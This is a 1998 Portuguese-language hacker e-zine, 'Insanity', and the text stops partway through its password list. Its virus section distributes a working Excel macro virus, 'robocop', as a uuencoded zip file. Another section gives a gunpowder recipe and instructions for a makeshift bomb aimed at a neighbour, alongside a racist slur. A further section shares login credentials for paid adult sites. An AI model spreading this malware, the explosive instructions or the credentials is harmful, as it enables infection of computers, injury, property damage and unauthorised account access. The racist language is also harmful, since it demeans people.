                     MELHOR VISUALIZACAO NO WORDPAD
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<    InSaNiTy    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
/////////////////////////////No-01-Outubro/98\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

III  NN      NN  SSSSSSSSS    AAA    NN      NN  III  TTTTTTTT  YY      YY
III  NNN     NN  SS          AA AA   NNN     NN  III     TT      YY    YY
III  NN NN   NN  SS         AA   AA  NN NN   NN  III     TT       YY  YY
III  NN  NN  NN  SSSSSSSSS  AA   AA  NN  NN  NN  III     TT         YY
III  NN   NN NN  SSSSSSSSS  AAAAAAA  NN   NN NN  III     TT         YY
III  NN    NNNN         SS  AA   AA  NN    NNNN  III     TT         YY
III  NN     NNN  SSSSSSSSS  AA   AA  NN     NNN  III     TT         YY
              
            NAO CONFIE NA POLICIA, ELES SAO UMA RACA FILHA DA PUTA
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                    ++++++++++++++++++++++++++++++++++++
+++++++++++++++++++ http://members.xoom.com/insanityzine +++++++++++++++++++
                    ++++++++++++++++++++++++++++++++++++ 
     
    REVISTA MENSAL:TODA PRIMEIRA SEGUNDA-FEIRA DO MES NA NOSSA HOME PAGE

INDICE
******

1- INTRODUCAO ......................................dexter07       
2- VIRII ...........................................dexter07
3- ANARCHY .........................................WORMBOY
4- XXX PASSWORDS ...................................dexter07
5- SEGURANCA NO WIN95 ..............................dexter07
6- NETBUS ..........................................dexter07
7- UUEncode ........................................dexter07
8- FRASES ..........................................dexter07
9- BONUS ...........................................dexter07
10- MEMBERS 

OBS.:O autor(es) nao se responsabiliza por nada que voce venha a fazer 
depois de ler esse zine
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

**************
*1-INTRODUCAO*
**************

Agora que jah estamos um pouco mais organizados, mas ainda nao muito, 
podemos fazer uma zine um pouco melhor, esse mes vamos falar sobre varios 
assuntos como seguranca no windows95 (se eh q tem), informacoes sobre o
netbus ,algumas senhas de sites pornos, etc..
Bom Proveito
 
*********
*2-VIRII*
*********
Porra meu, tah foda de escrever essa merda dessa sessao de virii, ninguem 
sabe porra nenhuma de virii ai? Se souber me mande um email que voce eh o 
novo editor de virii dessa zine, como nao sei quase nada de virii,vou por um
arquivo uuencode de um virus de macro de excel chamado "robocop".   

--------------------------------CORTE AQUI----------------------------------

_=_ 
_=_ Part 001 of 001 of file Xm-robocop.zip
_=_ 

begin 666 Xm-robocop.zip
M4$L#!!0````(`#:$)B(>'3'I#!X```!:```+````4D]"3T-/4"Y83%/M?`U<
M5->U[S[#0)"@&<D@3&8Z#(C1$N0!HM'$-HB8&J\$*YC8AE1'&07%&0)C:FS:
MD":Y-\^;MKDW]C;WU]SW[$O>[Z8VR:]-?<:^)H8H\F$P&$%`Y/M+%&1@9&#P
M8\[[KWW.P!D$/W+;V]=K#WN=\]]KK[WVQ]EGK[W7.</)JIFMO_K=?6ULPO%-
MYL<\XC06H.`),O%#PYB*2>011='+%O]V_%4=UT"!TNUD:I`_B.[Y7:!IH-F@
M(-#=H&#0=-`,T#V@F?*]#\'U7I`6%`IZ`!0&"@?I0/?)<@9<OP8R@B)`)E`D
M*`HT2Y;QW*"NT7\;7W_R8RVSX<^.>[&"67$M8,^QVSEF8<1X==%<H`E4<7ZQ
ME/RH4C;YU+?9N2M_%/R`BZ(E7@HO?SO[JD<04PFB/(9%Q3QTHT-/XULGX0WL
M"=1A&:YKV%J6SE:A'Y:S3':KQWU,$`3YF5%/(5/\P0S>;F_[E6G9+!=]_M6/
M0,S`ROMYJ_GLT]C8G$YWS&^2YS]0G@.F>OXU\APP\?F?-<GS3WU^H^>?YAD:
M$G/D>6`NKO-`7P?%R'-*+&@^*`[TWT#QH`10(F@!*`FT$+0(]"!H,6@)Z"'0
MPZ"EH&]PV\;8(S0>0<OX&&2XYXRE@E;(@_9;H)6@QT"K0'\'6@U*`ST.2@>M
M`7T;M!:4`:)1LP[T!.A)T'K0=T#?!3T%R@(]#?H>'W=2.\VX;@)MYF.!,0MH
M"V@K*`>4"]H&HB<D#[0#9`790/F@9T`T?@KIGH)V@IX%?1^T"T1/\V[0#T#/
M@WX(^A'H!7H&095F-:M\^FX^"E0H)2;K6S^(CX]/C$]Z=,%\@'CIM-R+I"-I
MT0]G)\3%SUXR>_E#64\^]GAJ^I,961G?R<A<D9;U1,JR%8\O2(Q+7YTR^XG<
MPIWF/%.*N3!WL^E16X%I67Y^7NYFLSW79BTD1294=JS(Q0FW5&3J0UEVFRVO
M,"LM(WW+EMS-EJP5NS9;\K+6KUXX5G!:[N8"6Z%MB]W$TTP+X^)-Z9NV63;;
M3:MS-Q68"YZC1X6F+.^BIO+;1G9<-?X0"6R:6DKI5#^I_S+1[S]D>DB3"@_3
MI@6)V0D)9LN2();-X::%#^+9BTD5BE3>DD4LNQ:-RUE\Y9+8N)PH"J1VTIH%
M"=)UF\K+:97E]JAB.#J@&I<N8C7"U+7?=PMMWSN)C-2F(5ESLBI3*!:2(7>!
M9:KV"O;K2MS#.9EL(UO%T0$\>N!RS1NA2SM%/>2I7U5\@WHF"]LFI!8IRA]"
MVG&V3;#?0$,KEZ^!Q'Y5DBRG%5:-]:*)IS.?5IF8'>G%7&:?3\J!&_1WD.+.
M'(?<?EZ:5K6/\X-X+$F1G]HOL!J,A*('I'B[.-*^%](!0/;54JYBG$\81;Y@
M.R*&GS$A_3Z@/ZR5%E?MXG+VA`EW1XC!5+1#PTM!KJV:C2AK,<^?\S1QEP*_
ML8'W*M#_CB&4"DVB&'DWX37`-IY_(])3^@AE@Z=B\<\2M@(/.`G9@?(@>5RU
M&Y)#[.69TF@\(KZ=3>A5H(/5,2C_=:!@=N__(NZ;P.NY_G>1ZU?K";T'M(>5
M?DKX0Z0'Z0D=`OKD>!+=`Y[_*.^?<M):1*@6Z+*54#?0OZC_^23A8>#<(4)7
M@3([^0)#.()%QM:[I+M^1'SGQX3N`WI*(]U]U#_@EVK<+2$:W&S.C0'WNQ\0
MB@//9JV>!9YJ,?`O6XB;`M003.AQH$5^ZWBN3.#^*X2^"Q35R'L2:&WZ[W_"
M^P_XB69"NX'2/R3TLD#M>XFOGU\'[N'YWP2Z5"&-OB-B8T!X,N']P-4=A`X"
M??(1H2-`[WHRP@E_`7PX@%`#ZO^=$FGT%XLUZH*MA'N0/N,-Z=D^(GYAE)Z^
M(V))P.H7>%^IVL6P3$+!JF@V4B"-WB,8ET/#A,.!#^TB=#^0_E>\?U2M8MRN
MD[RO'U(5BWE[^:A2T:@3V!J,;3Z3,Y@7EF;.S[<DL/@T6_;.O`26M6'%L^:\
MG6:[A:U-3TEG^Y?MM-LVI.=;K+`NHI@/VHK3LR"%_6$9FPLL%NNZ_&Q$K5N9
ML`MR3]H*MF^RV;87LN6VG58[>]R\P\+$YY"R@O'2+(7LR5QKMNW[A0S&+7=3
MGH4MVVS/?=;BS<F8&=+F+79+`73D(VM&CL5B+V2%&98\V!_FE>=:D,JYEFQ9
M2DBW<L2%J$49YF=1@PR[N<"^,W^-V9[#.:1Y62$[PQO)4LU4PVQ0FLT*B1U`
MDEYJYUK;]U=:<K?FV%&?O)T[K$_F9D-FK=FZU<(>A3P6+[F[>1D%N=LM]IP"
MV\ZM*&5GOJ6@<'-!;KX=>).,TG?:\W*M%IXM(\?,6[`K[W&;%?G76;,M!93*
M=N71'=B!?MU,9=H*'D/2+F_+EUOR\IB(U<".G7GFM0G+$QAO'5MML6Y%Q=CR
M''.!&5U24,CT5%"&_3GT,K4-_8^UWO+T-?P^TW59=C9+S2W,SS,_MRS/4H`.
M3$6[T6VB-$;B=N45,C$5'6G=9+9N1U]LLFVVY7.VBLSG4MF03IB`K^,>5WG-
MN"@NQ#F0O:B25M]^,.M!?,$@;VEN>BA]+D*@P`XR;LA]=C"B^`=^I;5F"TKJ
MG9"*];IJ1"6E$YEI4<Y:V/C2X-:.15@Y)V*Z3\"?&:O/);?8!N^AQ?[+3]XW
MW.K^X_ZQ^M+:]S]<_FWO?S:"*@(E[(^5^TX\,#M0.NU]'\/J>@M6UP6<8\?Z
MV\;7VU,=\^3]YUVWT?Z708W,6WXJ2MC,ZV#A._#;J\_BK]#^5T$EPI_77R?I
MED:UM'QNH0V5(!P0I`UE4)`I*"@R/NAG0?%Q_ZBAE00]0@*35N6BF#6=$&V0
M+`6:ET1Q%=L-?CXCG,EV<9E@83V>G_4"K1.DU=Q2MI1?[<(0MH?2RA4K>+9>
MV,ARQ&"^R7P/O/4<!P-M8RN!YP,3?S%P/.?O8?,X?I>1_G#@'X+?@Y1`X&0N
M(XIN3S`+WH<''S(]GF!ITPM<[Y'T$R[W>.4/L$/`2>LSN<YW@>?$!V,HP$YS
MF6BVDMH"')\8SO$NKC^8XQQ9/I]=8.ME_:1G)<\KL"&436OJQ1ZI/<7`\TAN
M'Z5%XV(7PDDWY/8)>X1`C]166I>J/=/X%G"5*A,3G=0V!EZRS$L=<_QJ>)J&
M31QP*CXU2FM1B>@.I:WP#C'O<).&A/^MC-,I#L]Q:8O,^#3,QIS3LV27!>$4
MV;W@E<E6X#P6)1!6HX9VF1\D;Y>!U5(]J<&".A#]\S(;QZ]),GY*F2!,:'ME
MF5DH>9^$`^_'AO^0A(,I;ZN,8[&Q[Y%Q$C;G6C[L!0W)K)1P,&W&UT@8#K5@
MEBGP<@,5Y08&H\7K97D#RLV6\0PX2HID_#@[P%X?PQ^R5DE/L$)/L!:.DWB5
M-V\B2U5-)K,(>[9QF9Q)9*@.NV29*$SL>V5LPB[ND,K;%A6K5^!&":NIC:VJ
M\79URIC:,B#C)')8^$DX%I-@DHRIW(TRIK*>]QO7_Y;?^#W:Y^=S?_E])Y?4
M>WYL[,6&W!:XN`RLW&\<U\LX',ZH'EEG,#FHU.,X6,8AZ,]PM;?<6!8KX<#[
M(+-8QH%PFF7*.`#/5)8"9RMPG@+;%?CY,3U:]K("OZ8>[\^]BOJ\*>,8.+'>
MD[$)"X=Z1=W<,M;@R='ZC]<SVG^\W%@%3E+@I0J<JL"K_<?KEJG`6?[C]<SV
M'Z]/CO]X?5[U'Z_/.XKZ'%#H_UB!2Q2X4H%K%+A148=.!>Y3U&?(?[S?W!+&
M2`I@P0'C<X4FP,M7,4/`]>,G"4XV4X!RO*EE>37+])&G&7$].'6<9^)7M'AL
M"V-*,V\OL"5NKN-.3"EF,N\P+8B/2TB,2UBR9)'I69O5M,ZZR;+=;+5BV6Q*
ML5AWVG<#F'=NV6K9;<G=G&.UT$RG+(.N/U5KX*`\KXX'+66OL[?!GXOED73=
MQCZ`C!UWH@AN6A/;`[[`.9&8[R(QS^WA+P[V<-X<\`1P][/WT8>T=[!9S7FT
MT/;GTI27=)LP(Q&>**7442QK)]FIY>9`SENBFN\(J"2IG&UPH-K986@Q`;_-
M+<Y>]H%ZHK9H=ASR\U@-U@A2RUKA7KX`C3>NHU1V.>RJMVP3<E%=)LJD)&/1
M@[1;U^?'=S@WT^>5BV9!`G%A1?C],@F1+$:@%HW7;6J9>8A/W2<F](;WCD:B
ML#AYVS53'A=)PHW:E)*<+)`C>QXHK_`PY$SRV*)[X=O?3(ZM$M['*X8LI4*\
M>KB^+U*2,P7AAGF^-C924Y(W0O9&[;QY&Y!?[7T6"@KK^$L.*US/)NQ5=\`I
M4&A:8WXNSV;.CB,+%`U/(HU"NT"Z,A$OXO$]0BO52J"QX$]/#I`?D)J/VVQP
M]N*N[`-7E/%^M$W%EBV(9@?&[J"4AJ=$Z$/:^W@%\]B._()<J]V4EFF2-^5+
MT%L,.L.!C@L?X%PCF#+HVBHL872]((3SZY`<9ZHET!N$LU:%$8)KC(I>-EQ?
M_JNJ]_$*1QX*IL?)L[##7&`QK;)MQYSS5,;J96E/FUB2:AY+5FW->9N/ZU6J
MM['V*L<:@E+FL(TJ%9-:,'7]*2V0?`/6;'-!]A*V#3KB%>T)9%)["K*E]L3?
M2GOVO8WMNE2?67^"^FAO4!_M+=0G6.K?1-_^W<A^I*K#J/!C<7%Q&#U;)YD[
MHGWFV\F?SNTL.^XF'WB\"/ACT$OR^ZA7</U[T#_(\?^.ZQ[0/X)H\?L3T$]!
M/Y/3_TF^_NWXZSRF]C^Q=[S^IZ-3^)_.*OQ/DC_E]OU/_ZG^AQR8SC<%Z67O
M5U](29Z+H!>#K.2WV*/R]5LX`PB)8@*>RG"!WA6(_#V%MV+>=U2QG%_/.VR`
MT9N2/.Z36`K+"._'F(]A&UL-G`)<B=A2DH$_X'58Q%C9AT'RAC%_QAX6S/%;
MO)RK'DF><!_W&<2SQ2BYT2/Y0@A7`C\*2T'X8]FOD`7\GL>K\P![B_L85G(]
MKWFD>KX)F>>Y_GB.\X#7SX_F.(O[,()Y+5;+>HB_E&/R1TQ.TB&5L_(O[&-8
MQ-AU/H;PK^9C&/,?[%+@(G:]OX'VNZ].PJ?]ZYL*'\,[LH_!B(\0/E;X&!IE
M'(V/##K'_`WY+%#A8TA2^!B6*GP,M-*9S,>0*GA]``^13X)-W/?/P`I.\CVH
M@E>BEG9)YIZ),A^/R?P+JYQ$#[51*_L,9L&Q:5*-YUT\B;^!9%8J9#:JQO7D
M3^K#2&+/*WP8KT_AY]BGD#DPJ<Q#K$11KM*?T:/`?0K?QH!J\GLZ),N$T\<H
M?N-[Q'`?GP2-:(.?[_YMIKQ'7)YG*[1(VT+VY]DCKKQN7^B[=G\B=WR?N-,R
M^3[1M/OZ?:)W54^[`=/:B?O#Z]?\OOO"J?9'4^\'([$?])^P'_1JF;CG*<9:
M#/XKK.7_#;JFXPY*=6J=9.=WLUV=M&/SU9N2/*Y7=9U>:6=W:WJ]?;\/Z^WW
MX:60WHDJ=WRKQG9\*<G[47:KWYA<XHWEO'L>2??-]IM+A9OO-[=-T>?2:))V
M6WZX5VM`A_P.@S.^[YIL3RSEV`[.5_R0V2,R/DE//"BY]97_Z1Q-S]'\YI\"
MV0-S?W\FGIR%\O=Q@OQ]&3W1R;)1V"A_"U<D?ROWIOQ=W#OR-W:=:NG;-_I&
M;K)GD>U/OG%Z]PJ>KJ'EB^\'3KP.1?^N^[1;_KYRXGO&J;KD1RV/[/G:TJO7
M<-UN68=JPKNE"E+TPC<1.SB6]6OX\,]OO(>8_'7@-#C1F+^&?6/F\;ON5@6/
MB0?,I"\&:8X+QCD;F0G/Y+VA09]=_?7@J;1-:Q[9P/DQG/\`/_^8<XH4QG>.
MBOI:Q"Y$S=\6O@B)S]1:5$=U_[)0[.H",RRY=HOI_C4O<0TO\_.O^->%"4S@
M?WS^3?<V^,_8</%.;;@[Y`YM^."]=VC#+VCOT(9WA-ZA#6^<=8<V_'38'=KP
M+\+_BS=<O%,/Z8[[\SM."\7/>&]_*O^"IYW_:F$1TTZZ=;S9D0)=G>IO"-$8
M*1K>X?2UG!I;KP#\OB20?S=W-T;4=+QBOP=+>W+F5".^`=]X;EBS-GW5BN69
M;X$[`[\B4?&UM8JOJ%7\=QPA<*;D,LW#WXI:S%_#"FR]*IFG_82?H_AY!D]I
MX#@![OIRNMDOO"[=^TW^RPIRS7D2'ZZE%SY67<]732'O-X7\9/H-;)^_4O_T
MY;8=^$5$AME::$K+H/0<82Q=/3'=J#:@SW2S8V?/CL\R1:6F13V<-5\1,ZHC
MT:-&9?I3:RW93T\0BD*G1W!.7/P$/6,,HWHN;DST!"FE-H7H4CSI2S;,CS$I
MBMDP'SHG<D@F:GZ4(IZ\83[E_[I/_@VI&])\\\N<L?QC<9X_%<ZR96/YQRJF
M5*%DREH>>61B/5(Q5TW0,[$J2J9"C[(^K7R,,^823:S8)$TMQ!,DWM#->*I;
MY+'_0CQRBRAY_K@3D'/[\KX^"6_:)+S827@QU_&DW;LIT,M[`_9(4^0GTG5F
M40"_AA3Y\RL,%[_>6Z3F5VW177A#%L3V0(D0X`=_R"N8P?IY3$V>CU<PD:V]
MB_\P+].\"1\Z6Q*(E1^D9"42*_=N)6L!L38%*UE)Q'IJNI*UD%B9,Y2L1<1*
MNT?)>I!8CVJ4K,7$>F2FDK7D%?3%XA!B3?-6-9YX"??Z\!*(%Z/UX242;W:H
M#V\!\0RS?'A)Q`L-\^$M)-Z,<!_>HO&U1P"W1+>V&F#R:B"5_QIQXFI@FO&;
M\CI`DOK/+<.[AM(P[V+C(+ZPU`?]I==1:>PM3#XKUYA2+87;5UGLIL4/QB\W
M95@*<BV%;/Q0/^BWEP4(?F+170*;)O]2E5H8*Y`-CQ4$A?#M'8+\:U-!L03C
M+WUN5J>;'*O79":PO^`AC%U_/_VWTR2OXNWU4JP0*]"HFR;W-:V7B#=QU`E,
M6N?^D$DK](/B/9*'416DZ-=`E7>.O13!?WTMC/RLEO^>ECR,-_N`0PB\JPY3
MY3+)84A+Z(`;+*%_@UJ;;OH=P(UV&/%WWZ%;JZ\'WZ$-CYI^AS9</^,.;;CV
MGCNTX=,U_]\V7,#',#;\MBB?I>.3_6WL=H\0OFN_O=\?O3[VL<2?YKC=\O_4
MQU]S^0*LME^0I&/B_VX)O_X]XWQYR<YW42FY6[8LY/\-A*?%\1^NQBUD0TL^
M?&:JWSM.?`_YM_\_]9<]W.WE[K8*=WL9A;8R=VO92%LIP'![Q7#GY\-MY:ZV
MS]WMGX^TEP^WEXUTEH]T5HRT5[C:RESM9:Z.SX<[*KA,&<)(>QD'%4.M9:[6
MLN&VTF&`YG)7"_$E59?:*BZUE0VUE3O;RH>:RA`HM:5LJ.68L_FHL[EDL*5\
ML*5TL*UTH+7$T7S,T724^(TE`\W'B$_GLH'F,D=SA13Z&\LHG"US-)9=;#S6
MUU32UU!RL>'HQ<:CO0U'>\_R<V-);Q/PD3["GUTX>Z2G`:'XPIGB"_6'>TX?
M[JDK[JG]]%SU9^>JCW35'.FL*6ZO_J2S^I.N4Y]TGORXX\L_(G2>/-11]7_;
MJ@XAM%0=:C[Q47/E(8_HD<(5\>KPM6&'R]'2U?C>[_<_\JU5<Z)CED8]$!\1
M;=!'Z@US=(9HG3Y2I^-G0V28+DJGC](;HO3Z:+TQ2F>(0%2GCY!2*1AE$`H9
M8[0A,CK,&!D:QH/.&*H#,(:&&8##]!%AR&Z(-ACG&/511KU1%V8,"S.$D8!1
M&V8("3.&A!HT/&BU!BW.H7IMF$ZK1="'A"$:$:+E@22-H5JC-@38`!P28J0L
M$-/J-10,(80-7*$1"D-"H<&HU45*>;5:8VAH1)@.#8S@-8P@)0B442H=`M0$
MG2X"0:^/T*,Y)`,]J)4^3&>@=H7RR@-##U>EA38"%+0RD#A43U1LA@;!&!QB
MF!%BT(089X00$[E0$]0'-0S34T#7::$!3=8998#L81$:K9$'`PK5Z:*B(N?$
MS)D3.W=._+SHQ'ES%L3,37DX:<?6)_[UY\__>O]K__Z;/3_]U]V%+UB^LS[=
MEKGVW==>.%7RNX[&BIZVD^<[3_9VG^P]]^7%[FI'3VW_A?J!GM/.WM.#CCIG
M'T*ML[?&V5?O=)P=<C0.7ZQS]=9>NECO&FAV.<Y0&&QR.9N'G4WN@:;A@4;W
MX-E1YUGW0//(8`N8(X--;F>SV]GB=K0`4W`V#?777>RN;#C]T>?'?_WQ)[]X
M^W\\]TSVFN^M?6SKT^O>>N.%FB\..'JJ1YS-5YPM5RZU776U>X8[/<-MUUPM
M'G>[9Y2P!\R1;@31W2FZ`3I$=Y<<AKO$D4YQM$N\VD-GA,N=XF4D=8M7SHM7
M+HA7>L2K%\1K_:*GCV20=,4K>04!"MM$=P?A4:[GVCF.>12IT(9"1]L(7.D6
M+[<1=K>+5_@929<[Q.$V"N"/M(BN9M'=+`ZWB,--!$::1%>3.-PJCD"^V>.J
M$YVUXE`#B8'O:J#H()@-'F>#>*E>O-0@#C42_])9D3@\D``"4NL\0W6>2US)
M0!T%)P\`CM/BP&F/H\[35RTZ3EWKJ[G67^=!<$#R-,DX>+0?,E]Z'#5B?PVR
M>`;.>"AO+65T>.4A/%C'^=",BC5YG*A,O0=,SO>0_!EQH):76$M%(Z\3213U
M#-:0?DFA',"I]O17B_W5GKXJ3_^7GKXO/;TG/;U5GO-5UWJJKEZH&NVI&NVN
M'.T^<:7K\\N=E:,=E:-=)]SG3KJ[3X[T?.'NJG)WG'!WGG!W?8XPTGY\%$:!
MYG`R"B.MY<,T@5-PM7_NZCKA:J_$9#X"T]!6/M)6`5N`R1\3_E#;,5='F:N3
MC,5P2ZFKM62X[>A(*\`Q2FH]YFHO=;4==;4<'6HI'6HM<;4=&^8FP]E1=@D9
MVTH'6X]=:BYS-L,<T'FHJ<39<M39RB?_UE)G2RF8@TU'!YH^XX#,@1/9F\L&
MFTL'FF`:*A`<3<?[&RLN-I4ZFLL'FH^#W]]4VM=8"G/0UW3L0L.Q\V=+>YLJ
M^IHK>IO*SL,HU(-?`C-QONE(S]FC/75'>NH^[:X^?.[TI^?JBCMK2KIJCW;7
M'NVJ/=)1>[BK^G#'J<.=53`*G\`B='T!N_!16^5';55_:*TZU'CB_S14'A3'
M[(+'X[HZ"KO0UMWTNX/[5SR6%ADY+\(0K4?`A$\S?!1F&YB#,'VT#F8"1D$7
MJ2<K`.L`8Q%-=D''SY(P<>:$(8E/^%!ET"-[),V',`0(-"L:);M@"(LTZB(-
MF/K"(N4),XP$R"AH,2=':&AF)NO`I^X("GS"ER=MLA=&S-AD,K3Z4'[6*N?S
M4#J'A"!(1D$7(AD(*:HUZD.-.IKV=;`I8:$(!H30,)X1VD(0]/)92W-^&+<+
M>AUJ'J%';6&G2!M9#21)&3%I0XF.5)%.K61TN-V!<417Z"0;048-\[E^AI9L
MP0P8"(!0HV0=0D@>5A*=%A6JBX)UX'8ADOHA-`)6@W=+))U#8!H0(E&0'F8X
M,OJ!Z+EQ<^8FSD68MR`F-O7AQ<]LR_JW-U_Z\+V?'_SMS_>_^P][W_K!,S_8
MM&UCYB]>M)?_\=V6NJ,];2=ZNZKZSGWI@%'HKKUXKL[14^<X7^>\<,9YL?Y2
M;]VEWFIG[REG?]V0XZQKH,WE:'4Y&EV.>I>C8<C1@//HP-G1P6;W8/-(?^.P
MXZQ[L&%DL&$8=F&@:=39=-G9?-G1Y'8@VN@>:(#M<`_`IL#Z?-'6\$GME[^M
M*'W[M^^]^ES>N@WK_L[RO2=_^<]%U2<.])_G=N%2\^6A]BM#7==<[0@>%[<(
MP[`('1YIZAYIY[-K)TW"X-#4W<ZM`S]?[J%P19KMNWDJSN?$R^<X'[;@O'B9
M\\E>G"-\A<O#4EQN)Q,`Y;`XESF'&R`YK\2A+%)9,"*H3"LW*.T48`Y@"$:X
M+9!#HS@,H]#,YW]N)F`%W`WB\!G,[607,/ECPJ>Y%'-LM3C(Y_\AI)X1G6?(
M(C@;B4E3-'$\`_4T`\-`#/)Y&QQ,U)<:,%%SHU`KS>U\\J^AJ?@B!Q=K"5RL
MI3D<<W5?G7BQVN.HHBD:V%'/)4][^D^1<'^=2.&T"/G!6FG^%P?K23]9A'KB
M.'D4TSLW!QX*IZC^DE4B4U5-8)!J2VK)1J`.U607('F1!QB%"V01/.<KKYVK
M]'17P1;<Z/M7U>D3I]^*TVO>^`6^?XT=_2`>O+V"[_>O]\C?O]XM_W]$C?Q_
M$*?+_^^0G""K!>;S_2O?PT6F\#Q,SDN'42-]/TOO&[ROAI211&5D@3*2I(PL
M5$86*2,/*B.+E9$EW'\S]A[,)Y;@$TOTB2WPB27YQ!;ZQ!9QKPM]04V_2^'_
MIRI8(WT_;/1MLY6[EC1R`KUY4_X;Q?G2OZ'B,JI;_\YWJCWT_P-02P,$%```
M``@`[84F(H]D^9AH!```Y!4```P```!23T)/0U-20RY46%3E6%]OVD@0?T?B
M.TR1>H&[U`+:2KV<\N`C24-5<(3S1Z=>56WL"5YA[UKK-8%[Z*>[SW6Z71OP
M'PP)*;FKU'U`]L[LS&]_LS/CY1.<SAST!\01W("1];O5LR[@\]_?,.JU>NT?
MN.Z/KNRA.3@]@F0L3&N1->J_[P\7\VJ\1Q$0-M<B\^KRW!IEHB$=>S(@`N$#
MGZ#0IO]`XAU"_V"*<"^HE,@@F,,=%9$$U'N!0&\&IE3$D5&OG:-:32.0'D+$
M8^$@.-Q%`_K@\1!ASF/PZ43I2$/;3ZA@),"C#//7M5&OV?'M4J'9JM<TVG$(
MQ]!.GZ>YY_371@E$39IAZ%.'2,J983J23O&&B\DMYY.\=E[+=@0BNPI=]<K&
MRL09\2-,]<ZX@)F:ZL`E+RQ:&HV,'H^93+7UZ-]5ZS5G+6.H]JV,D?3ATD.6
MK5OML%.<TPCF6Q$T4WLM8\#=V,<U1%M1E=8VYRN4#4U_HP+EBO\2TE/F*C_9
MW!!G.10%AM+P5=B^H<SE]QFL:QK16U_#N10Q%G6+;\58K[@P7;>D5TE#(T01
M<49\8^9'C8R.E(26HC2<PY>B)7(G41P=5SMN=EIKK/TG@'O6Q9/P=DMX-X,X
MH5'HD[GIHY!1,5V6P_80I0*3&.\H/#;ZZ)3.Y`)($O&%`KKI2N-$O<JM\2ZX
MZ.[)Q;9M/G0`EX#2`.R*)COH%716.UH<S6?TM$LV;JZ[ADVF.>5RF<B_9R7C
M$64ZP["]M*7NM1L[OM4]Z.=]CO7:F"^)PQ.PSF!@]D966E#UZ=@[@D);-6/)
MOUBAKJQ?*T;:6E=*NKF>T`"F+P\A?)GG?D.[_0[Z9['V[:^/;JBI._73377Y
M.^FK97C;,OJQ7U3;&U7Y`Z/049<M:2<JRYWUD7YSC7$O;G^8ZK_YS%28R'-J
ML<1I`H=(O:#4&)*,^`D:+Q1K1E8==__Z>4J'6:3,N"IE=CGZ#S<??>;,J%@S
M)1$R#B^(].`7:/Q9V,\#M@U=MZ'Y:'.Y<[MS2+^5_D<V\'KM@%$'P2,B\#&*
MX(+,?4[<Y,KH*M43,F].U48"]3S@3'K-4+VI\&GAZS:8RJ>6=;JY2*9'7[L>
M\?MSU)==K=)NE\4][L<!NZ&NHN\8NF_?I@HCPL;8;)BO2WEV0Y5>MOJ,Y[O#
MJLSW@U!0)F%P";9'%.VYN!HV_4LK==_DYZ2@$Y2>X/'86P^%8<>:=D?04%9*
M;S?*K%CZE*$&6K4R05<AN&(N"KU0R6;^D+.\4''&15]IS!*I_J`(5&"=5$6?
M`4W3=B+3E.JA[RL211#[9-3I=98]4O]54OJ'`C[9'\W!YT8N#CD;/8\(XDA%
M4C-)B*/CSB%\1#:6WM'QN]:3`J77V'*>Y$9#664N$6Y%)-^\^R$B^3#EOV:4
M=[O/RWFW_4-E3_Z2>[KR=6`81GJ[T36W7MO>@#?7\"V]^/^X/!5O3JOKRG/<
MG?H@/<HFP#B8UV`[A#$4<$]]'^ZHVCB5+^"W5ZU62RN_6OO/]%]02P$"%``4
M````"``VA"8B'ATQZ0P>````6@``"P```````````"``````````4D]"3T-/
M4"Y83%-02P$"%``4````"`#MA28BCV3YF&@$``#D%0``#``````````!`"``
H```U'@``4D]"3T-34D,N5%A44$L%!@`````"``(`<P```,<B````````
`
end

--------------------------------CORTE AQUI----------------------------------

***********
*3-ANARCHY*
***********
           FHC                               INSANITY
         _______                               
        /       \                                      __________________ 
       /  °   °  \               ___________          /                  |
      |    /-\    |          ___/ANARCHYY!!!:---     |  Insanity Rocket   \ 
       \  #####  /              \___________:---     |     Launcher       /
        \_______/                                     \__________________| 
                                  

Como sempre, FUDENDO tudo que está no meu caminho que seja legislativo
       FODAM-SE AS LEIS, EU QUERO UM MUNDO LIVRE!
Imagina se eu soubesse fazer um rocket launcher heim?? hehehe
   Época de eleição, temo que vota... mas Vota em quem???????
     Já ensinei 6 a faze polvora? eu insino, PREST TENCAUM!

Pega carvao , kralho, carvao me lembra preto e preto me lembra pobre!Raça 
filha da puta!
Enxofre
Nitrato de potassio ou de sódio (SODIUM) mas tamem Salitre

Mete 2/3 de um copo de carvao e o que fica vazio do copo  completar com 
carvao coloca meio
enxofre e meio nitrato q c vai mistura com agua ate virar uma
pasta e coloca para secar no sol ou na secadora da tua MAMA , POLVORA!
C vc for um boyzinho nojento ou sua MAMA num deixa tu faze polvora, 
compra em ksa de macumba!

6 querem fuder seu vizinho chato que faz barulho opra kralho e ainda é 
crente? MERDA NELE!
 Bomba de MEEEEEEEEEEEEEEEEERDA
 Material
  MERDA, de preferência de cavalo que chera melhoh!
  Polvora daquela que nois fez ou diesel
  Fita crepe ou silve tape

agora a melhoh parte
MISTURA ESSA PORRA TODA MENOS A SILVER TAPE
bota fita crepe pra cola
e deixa um buraco pra mete um pavil ou cigarro
e lah vem merda!

     PORQUE SER ANARQUISTA?
PQ EU ODEIO OS POLITICOS, ODEIO A ECONOMIA, ODEIO AS ESCOLAS, ODEIO TUDO 
DESSA PORRA DESSE PAIS QUE TEM DE TUDO MAS PORRA NENHUMA FUNCIONA

    Irrita professor:
Pergunta pro teu professor de geografia isso
- Pofesso, terra cercada de agua eh ilha neh?
- EH!
- entaum pusque qui nois mora num cutinente si eh tudo cercad di agua?


*****************
*4-XXX PASSWORDS*
*****************

Passwords verificados dia 17 de Outubro as 23:59

Url: http://www.perfect-pics.com/getem/ulthm.htm
Username: peach
Password: peach

Url: http://www.maturebabes.com/members/
Username: marc 
Password: marc

Url: http://www.megapussy.com/members/
Username: zena69  
Password: zena69

Url: http://www.lovebugs.com/pics/
Username: neely  
Password: 4326

Url: http://www.carolcox.com/pictures/index.html
Username: asdf  
